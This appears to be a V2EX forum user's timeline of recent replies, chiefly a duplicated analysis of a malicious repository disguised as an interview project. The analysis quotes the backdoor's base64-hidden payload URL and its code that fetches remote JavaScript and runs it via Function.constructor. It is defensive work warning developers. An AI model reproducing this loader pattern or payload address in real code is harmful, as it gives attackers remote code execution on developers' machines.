wxsx666 最近的时间轴更新 wxsx666 最近的时间轴更新 |
wxsx666V2EX 第 598164 号会员,加入于 2022-10-20 00:24:19 +08:00今日活跃度排名 23285 |
wxsx666 最近回复了
1 天前 回复了 lvlajzhao1983 创建的主题 › 职场话题 › 今天 2 个面试,结果全是骗子。骗子现在非常猖獗,大家小心 |
这个仓库我看了,结论很明确:
不是“普通有漏洞”,而是非常像故意塞了后门的恶意仓库,别跑。
核心证据在 server/controllers/userCntrl.js:
• 它会读取 .env 里的 DEV_API_KEY
• 这个值其实不是正常 API key ,而是一个 base64 编码后的 URL:
aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL1JSQ0tH
解码后是:
https://jsonkeeper.com/b/RRCKG
• 代码会去请求这个远程地址拿一段内容:
SessionContent = (await axios.get(src,{headers:{[x_secret_key]:_sign}})).data.cookie
• 然后最危险的地方来了,它直接动态执行远程返回的代码:
handler = new (Function.constructor)('require', SessionContent);
handler(require);
这基本等于:
“启动服务时,从外网拉一段隐藏 JS ,再在你机器上直接执行”。
这不是正常业务代码写法,属于典型高危后门/投毒模式。
再结合这些点,风险更高:
• .env 被直接提交进仓库,本身就很反常
• 远程载荷地址做了 base64 隐藏
• 用 Function.constructor 执行字符串代码,明显是规避审查的套路
• 仓库里还带了大量不该提交的依赖文件,整体很像“面试投递样本 + 恶意投毒”
所以我的判断:
1. 这仓库高度可疑
2. 很像伪装成面试作业/项目的投毒代码
3. 如果有人本地运行过,应该按“可能已中招”处理
建议马上做的事:
• 不要再运行这个仓库
• 如果已经执行过 npm install / npm start / node index.js:
• 立刻断网/隔离测试机
• 检查 shell 历史、SSH key 、浏览器 Cookie 、密码管理器、开发环境 token
• 轮换 GitHub / GitLab / npm / 云平台 / 邮箱密码和 token
• 最好放到纯沙箱或虚拟机里做后续取证,不要在主力机复现
如果你要,我下一步可以继续帮你做两件事里的一个:
• 继续深挖:把这个仓库的恶意链路、触发条件、影响面再拆细
• 给你整理一版“面试钓鱼代码识别清单”,以后看到类似仓库一眼就能筛掉
不是“普通有漏洞”,而是非常像故意塞了后门的恶意仓库,别跑。
核心证据在 server/controllers/userCntrl.js:
• 它会读取 .env 里的 DEV_API_KEY
• 这个值其实不是正常 API key ,而是一个 base64 编码后的 URL:
aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL1JSQ0tH
解码后是:
https://jsonkeeper.com/b/RRCKG
• 代码会去请求这个远程地址拿一段内容:
SessionContent = (await axios.get(src,{headers:{[x_secret_key]:_sign}})).data.cookie
• 然后最危险的地方来了,它直接动态执行远程返回的代码:
handler = new (Function.constructor)('require', SessionContent);
handler(require);
这基本等于:
“启动服务时,从外网拉一段隐藏 JS ,再在你机器上直接执行”。
这不是正常业务代码写法,属于典型高危后门/投毒模式。
再结合这些点,风险更高:
• .env 被直接提交进仓库,本身就很反常
• 远程载荷地址做了 base64 隐藏
• 用 Function.constructor 执行字符串代码,明显是规避审查的套路
• 仓库里还带了大量不该提交的依赖文件,整体很像“面试投递样本 + 恶意投毒”
所以我的判断:
1. 这仓库高度可疑
2. 很像伪装成面试作业/项目的投毒代码
3. 如果有人本地运行过,应该按“可能已中招”处理
建议马上做的事:
• 不要再运行这个仓库
• 如果已经执行过 npm install / npm start / node index.js:
• 立刻断网/隔离测试机
• 检查 shell 历史、SSH key 、浏览器 Cookie 、密码管理器、开发环境 token
• 轮换 GitHub / GitLab / npm / 云平台 / 邮箱密码和 token
• 最好放到纯沙箱或虚拟机里做后续取证,不要在主力机复现
如果你要,我下一步可以继续帮你做两件事里的一个:
• 继续深挖:把这个仓库的恶意链路、触发条件、影响面再拆细
• 给你整理一版“面试钓鱼代码识别清单”,以后看到类似仓库一眼就能筛掉
2025 年 2 月 11 日 回复了 tomhuang2002 创建的主题 › 分享创造 › cursor 对我帮助不少,所以我写了一本关于 cursor 的小册 |
好贴,感谢分享
2025 年 1 月 11 日 回复了 hcmwong 创建的主题 › 酷工作 › [远程] [saas] [AI] 招资深 Java 工程师 2 名, AI agent 项目相关 |
联系方式是一个机器人呢
内推简历,石沉大海,
2023 年 9 月 6 日 回复了 zstyle1024 创建的主题 › OpenAI › 有推荐的购买 OpenAI API 接口的渠道吗? |
openai-sb 有提供 api,就是太贵了,随便问了几个问题,一两分钟, 几块钱没了
2023 年 4 月 20 日 回复了 studyingss 创建的主题 › VPS › 分享下我的稳定访问 chatgpt 的方案,免费给大家用。 |
亲测可以,感谢 up
2023 年 4 月 10 日 回复了 psyer 创建的主题 › 问与答 › DNS 污染 部署的 ChatGPT 套壳网站被墙了 |
我也一样,小范围几个朋友用,今天一看,直接被墙了..咋搞,楼主解决了吗
2022 年 11 月 3 日 回复了 MrCsharp 创建的主题 › 深圳 › 你们坐公交车遇到过这样的女的吗? |
习惯就好
Select Language